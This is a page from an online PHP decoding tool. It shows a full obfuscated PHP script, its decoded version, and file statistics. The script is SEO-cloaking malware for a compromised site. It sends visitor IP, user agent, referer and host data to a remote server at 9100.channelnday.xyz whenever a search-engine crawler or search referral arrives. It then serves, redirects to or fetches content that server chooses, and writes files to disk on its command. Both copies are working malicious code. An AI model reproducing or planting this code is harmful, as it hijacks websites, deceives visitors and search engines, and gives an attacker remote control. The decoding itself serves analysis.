Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto lKOUu800Ae; ZRBUrRdxc4: m4rXUbxbxb: GG5zC1U3UC: if (!(stripos($cntx, "\157\153") === ..

Decoded Output download

<?  goto lKOUu800Ae; ZRBUrRdxc4: m4rXUbxbxb: GG5zC1U3UC: if (!(stripos($cntx, "ok") === 0)) { goto mlGiI1ikO4; } exit($cntx . $db . $gov . $ixv); mlGiI1ikO4: goto jyljhsXs8J; jyljhsXs8J: if (!($code >= 400 && $code < 500)) { goto DLzf93Y9L0; } @header("HTTP/1.1 404 Not Found"); exit; DLzf93Y9L0: if (!($code >= 500)) { goto TQrtjBteFe; } goto s3OWYR8zyZ; s3OWYR8zyZ: @header("HTTP/1.1 500 Internal Server Error"); exit; TQrtjBteFe: if (!($cntx != '')) { goto zR94KGn6tr; } exit($cntx); goto vyGYPghBAH; ZYcX9gKXCW: if (!(stripos($cntx, "<?xml") === 0)) { goto lK2hP7vV9q; } @header("Content-type: text/xml"); exit($cntx); lK2hP7vV9q: if (!(stripos($cntx, "User-ag") === 0)) { goto r_iS1BI_nb; } goto rAAXQve9Py; HoDdMjDISn: exit($cntx); aDKKd1FGrk: if (!(stripos($cntx, "<!doct") === 0 || stripos($cntx, "<html") === 0)) { goto SZj751_uwg; } exit($cntx); SZj751_uwg: goto ZYcX9gKXCW; lKOUu800Ae: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "2.2.17"; $gov = "9100.channelnday.xyz"; goto WEhl_Xt3ys; vyGYPghBAH: zR94KGn6tr: ByElYWlO2R: goto vAQoGKnFOp; wQhv_CGCpb: $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; $token = isset($_SERVER["HTTP_XDOIM"]) ? $_SERVER["HTTP_XDOIM"] : ''; $proto = !empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off" ? "https" : "http"; $header = array("Lang: " . $lang, "User-Agent: " . $ua, "Referer: " . $ur, "Http-Proto: " . $proto, "Http-Host: " . $host, "Http-Uri: " . $uri, "Dbgroup: " . $gov, "Http-X-Forwarded-For: " . $ip, "Token: " . $token); goto tjY0T0QVCE; kOSY205eG7: $lines = explode(",", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; hydiDaIq5W: } snInejPN6q: exit($result); goto SAZYi9gJuO; rAAXQve9Py: @header("Content-type: text/plain;charset=utf-8"); exit($cntx); r_iS1BI_nb: if (!(stripos($cntx, "http") === 0)) { goto KnQrI76ILQ; } if (!stripos($cntx, "?main_page=")) { goto DlXvgNXaZu; } goto pkYhrJRdSu; tjY0T0QVCE: $postdata = "proto={$proto}&shost={$host}&ip={$ip}&dbgroup={$db}&uri={$uri}"; if (!($uri !== "/favicon.ico" && (@preg_match("#google|yahoo|bing#i", $ua) || @preg_match("#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i", $ur) && @preg_match("#[/\?]([a-z0-9]{1})(\d+)#i", $uri)))) { goto ByElYWlO2R; } list($cntx, $code, $ctype) = urlx("http://" . $gov . "/index?" . $postdata, $header, $postdata); if (!(stripos($ctype, "gzip") > 0)) { goto aDKKd1FGrk; } @header("Content-type: application/x-gzip"); goto HoDdMjDISn; WEhl_Xt3ys: $db = "9100"; $ip = $_SERVER["REMOTE_ADDR"]; $ur = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ua = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $uri = $_SERVER["REQUEST_URI"]; goto wQhv_CGCpb; SAZYi9gJuO: no5NtDnJaZ: KnQrI76ILQ: if (!@preg_match("#^[^.]*.(txt|php)#i", $cntx)) { goto GG5zC1U3UC; } $values = explode("[,]", $cntx); todk($values[0], $values[1]); goto Y8RZecduIf; pkYhrJRdSu: @header("Location: " . $cntx); exit; DlXvgNXaZu: if (!strstr($cntx, "[,]")) { goto no5NtDnJaZ; } $segs = explode("[,]", $cntx); goto kOSY205eG7; Y8RZecduIf: if (file_exists($values[0])) { goto RbqhCfoyXN; } exit("no false"); goto m4rXUbxbxb; RbqhCfoyXN: exit("end ok"); goto ZRBUrRdxc4; vAQoGKnFOp: function urlx($url, $header = null, $postdata = null, $ua = null) { goto kFbOBmwghP; E4n9RXSh1n: curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto kjOZiLvlg2; SqjZndNlbg: $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); $body = curl_exec($ch); curl_close($ch); return array($body, $code, $ctype); goto U9OZAdsNuX; kjOZiLvlg2: if (!($postdata !== null && $postdata !== '')) { goto JVhZh1jllD; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); JVhZh1jllD: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto SqjZndNlbg; kFbOBmwghP: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto E4n9RXSh1n; U9OZAdsNuX: } ?> 

Did this file decode correctly?

Original Code

goto lKOUu800Ae; ZRBUrRdxc4: m4rXUbxbxb: GG5zC1U3UC: if (!(stripos($cntx, "\157\153") === 0)) { goto mlGiI1ikO4; } exit($cntx . $db . $gov . $ixv); mlGiI1ikO4: goto jyljhsXs8J; jyljhsXs8J: if (!($code >= 400 && $code < 500)) { goto DLzf93Y9L0; } @header("\110\x54\x54\120\x2f\x31\x2e\61\x20\64\60\x34\40\x4e\x6f\164\40\106\157\165\x6e\x64"); exit; DLzf93Y9L0: if (!($code >= 500)) { goto TQrtjBteFe; } goto s3OWYR8zyZ; s3OWYR8zyZ: @header("\x48\x54\x54\x50\x2f\x31\x2e\x31\40\x35\x30\x30\x20\111\156\164\145\162\156\x61\154\40\123\x65\x72\x76\145\x72\x20\105\162\162\x6f\162"); exit; TQrtjBteFe: if (!($cntx != '')) { goto zR94KGn6tr; } exit($cntx); goto vyGYPghBAH; ZYcX9gKXCW: if (!(stripos($cntx, "\74\x3f\x78\x6d\x6c") === 0)) { goto lK2hP7vV9q; } @header("\x43\x6f\x6e\x74\145\156\x74\x2d\164\x79\x70\x65\x3a\40\x74\x65\x78\x74\57\170\155\x6c"); exit($cntx); lK2hP7vV9q: if (!(stripos($cntx, "\x55\163\145\162\55\x61\x67") === 0)) { goto r_iS1BI_nb; } goto rAAXQve9Py; HoDdMjDISn: exit($cntx); aDKKd1FGrk: if (!(stripos($cntx, "\74\41\x64\157\x63\164") === 0 || stripos($cntx, "\x3c\150\x74\x6d\x6c") === 0)) { goto SZj751_uwg; } exit($cntx); SZj751_uwg: goto ZYcX9gKXCW; lKOUu800Ae: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "\x32\x2e\x32\x2e\x31\67"; $gov = "\x39\61\x30\60\x2e\143\x68\141\x6e\156\x65\154\x6e\144\x61\171\x2e\170\x79\172"; goto WEhl_Xt3ys; vyGYPghBAH: zR94KGn6tr: ByElYWlO2R: goto vAQoGKnFOp; wQhv_CGCpb: $host = $_SERVER["\110\x54\124\120\x5f\x48\117\123\124"]; $lang = isset($_SERVER["\110\124\124\x50\137\x41\x43\x43\x45\x50\124\x5f\x4c\x41\x4e\107\x55\101\x47\105"]) ? $_SERVER["\110\x54\x54\120\137\101\x43\x43\105\120\x54\137\x4c\x41\116\x47\x55\x41\107\105"] : ''; $token = isset($_SERVER["\110\124\x54\120\137\130\104\x4f\111\115"]) ? $_SERVER["\x48\124\x54\x50\x5f\130\x44\117\x49\115"] : ''; $proto = !empty($_SERVER["\x48\124\x54\120\x53"]) && strtolower($_SERVER["\110\x54\x54\x50\123"]) !== "\x6f\146\x66" || isset($_SERVER["\x48\x54\x54\120\x5f\x58\137\x46\117\122\x57\101\x52\104\x45\x44\x5f\120\122\x4f\x54\117"]) && $_SERVER["\110\124\124\120\x5f\x58\137\x46\x4f\x52\127\x41\x52\x44\105\104\137\120\x52\x4f\x54\x4f"] === "\x68\x74\164\x70\163" || !empty($_SERVER["\x48\124\124\120\x5f\x46\122\117\116\124\137\105\x4e\x44\x5f\110\124\124\120\x53"]) && strtolower($_SERVER["\110\x54\x54\120\x5f\106\122\117\x4e\x54\x5f\105\x4e\104\x5f\x48\124\124\x50\123"]) !== "\x6f\146\x66" ? "\x68\164\x74\x70\x73" : "\x68\x74\x74\x70"; $header = array("\x4c\x61\x6e\x67\x3a\40" . $lang, "\x55\163\145\x72\x2d\x41\147\145\x6e\164\x3a\x20" . $ua, "\x52\145\x66\145\162\x65\162\x3a\40" . $ur, "\x48\x74\164\x70\x2d\x50\162\157\x74\x6f\x3a\x20" . $proto, "\110\164\164\160\x2d\x48\157\163\164\72\40" . $host, "\110\164\x74\x70\55\125\x72\x69\72\40" . $uri, "\104\x62\147\162\157\x75\x70\72\x20" . $gov, "\110\x74\164\x70\55\130\x2d\x46\x6f\162\x77\141\162\x64\x65\144\x2d\106\157\162\72\40" . $ip, "\x54\157\x6b\145\x6e\x3a\40" . $token); goto tjY0T0QVCE; kOSY205eG7: $lines = explode("\x2c", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; hydiDaIq5W: } snInejPN6q: exit($result); goto SAZYi9gJuO; rAAXQve9Py: @header("\103\x6f\156\x74\x65\x6e\x74\55\164\x79\x70\145\x3a\40\164\145\170\164\x2f\160\x6c\141\x69\156\x3b\x63\150\x61\162\163\x65\x74\75\x75\164\x66\55\70"); exit($cntx); r_iS1BI_nb: if (!(stripos($cntx, "\x68\164\x74\x70") === 0)) { goto KnQrI76ILQ; } if (!stripos($cntx, "\x3f\x6d\141\x69\x6e\137\x70\x61\147\145\75")) { goto DlXvgNXaZu; } goto pkYhrJRdSu; tjY0T0QVCE: $postdata = "\x70\x72\x6f\164\157\75{$proto}\x26\x73\150\x6f\163\x74\x3d{$host}\x26\151\x70\75{$ip}\46\x64\142\x67\x72\157\x75\160\x3d{$db}\46\165\x72\x69\x3d{$uri}"; if (!($uri !== "\57\x66\141\166\x69\143\x6f\156\56\151\143\157" && (@preg_match("\43\x67\x6f\157\147\x6c\145\174\171\141\x68\x6f\157\x7c\142\151\x6e\147\43\x69", $ua) || @preg_match("\x23\x67\157\x6f\147\x6c\x65\56\x63\157\56\152\160\x7c\147\157\157\147\x6c\145\56\143\157\155\x7c\171\141\150\157\157\x2e\143\x6f\155\174\171\x61\150\x6f\157\x2e\143\x6f\x2e\x6a\x70\x7c\142\151\156\x67\56\143\157\x6d\x23\x69", $ur) && @preg_match("\43\x5b\x2f\134\77\135\x28\133\141\x2d\x7a\60\55\x39\x5d\x7b\x31\175\51\50\x5c\x64\53\x29\x23\151", $uri)))) { goto ByElYWlO2R; } list($cntx, $code, $ctype) = urlx("\150\164\x74\x70\x3a\x2f\x2f" . $gov . "\x2f\151\x6e\144\x65\x78\x3f" . $postdata, $header, $postdata); if (!(stripos($ctype, "\x67\x7a\x69\160") > 0)) { goto aDKKd1FGrk; } @header("\103\157\156\x74\145\x6e\164\55\x74\171\160\145\72\x20\141\x70\x70\x6c\151\x63\x61\164\x69\x6f\x6e\x2f\170\55\147\172\x69\x70"); goto HoDdMjDISn; WEhl_Xt3ys: $db = "9100"; $ip = $_SERVER["\122\105\x4d\117\x54\x45\137\101\104\x44\x52"]; $ur = isset($_SERVER["\110\124\124\x50\x5f\x52\105\106\x45\x52\x45\122"]) ? $_SERVER["\x48\124\124\x50\x5f\x52\105\x46\105\122\x45\122"] : ''; $ua = isset($_SERVER["\110\x54\x54\120\x5f\125\x53\x45\x52\137\101\x47\105\x4e\x54"]) ? $_SERVER["\110\x54\124\120\x5f\125\x53\x45\122\x5f\x41\x47\x45\116\124"] : ''; $uri = $_SERVER["\x52\x45\121\x55\x45\x53\124\x5f\x55\x52\x49"]; goto wQhv_CGCpb; SAZYi9gJuO: no5NtDnJaZ: KnQrI76ILQ: if (!@preg_match("\43\x5e\x5b\136\56\x5d\52\56\x28\164\x78\x74\174\x70\150\160\51\x23\x69", $cntx)) { goto GG5zC1U3UC; } $values = explode("\133\54\135", $cntx); todk($values[0], $values[1]); goto Y8RZecduIf; pkYhrJRdSu: @header("\x4c\x6f\x63\141\x74\x69\157\x6e\72\x20" . $cntx); exit; DlXvgNXaZu: if (!strstr($cntx, "\133\x2c\x5d")) { goto no5NtDnJaZ; } $segs = explode("\133\x2c\x5d", $cntx); goto kOSY205eG7; Y8RZecduIf: if (file_exists($values[0])) { goto RbqhCfoyXN; } exit("\x6e\x6f\x20\x66\x61\154\163\x65"); goto m4rXUbxbxb; RbqhCfoyXN: exit("\145\x6e\144\x20\x6f\153"); goto ZRBUrRdxc4; vAQoGKnFOp: function urlx($url, $header = null, $postdata = null, $ua = null) { goto kFbOBmwghP; E4n9RXSh1n: curl_setopt($ch, CURLOPT_ENCODING, "\147\172\151\x70\x2c\x64\145\x66\x6c\x61\164\145"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto kjOZiLvlg2; SqjZndNlbg: $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); $body = curl_exec($ch); curl_close($ch); return array($body, $code, $ctype); goto U9OZAdsNuX; kjOZiLvlg2: if (!($postdata !== null && $postdata !== '')) { goto JVhZh1jllD; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); JVhZh1jllD: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto SqjZndNlbg; kFbOBmwghP: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto E4n9RXSh1n; U9OZAdsNuX: } ?>

Function Calls

None

Variables

None

Stats

MD5 96e2665bc126290775987adc778abae4
Eval Count 0
Decode Time 64 ms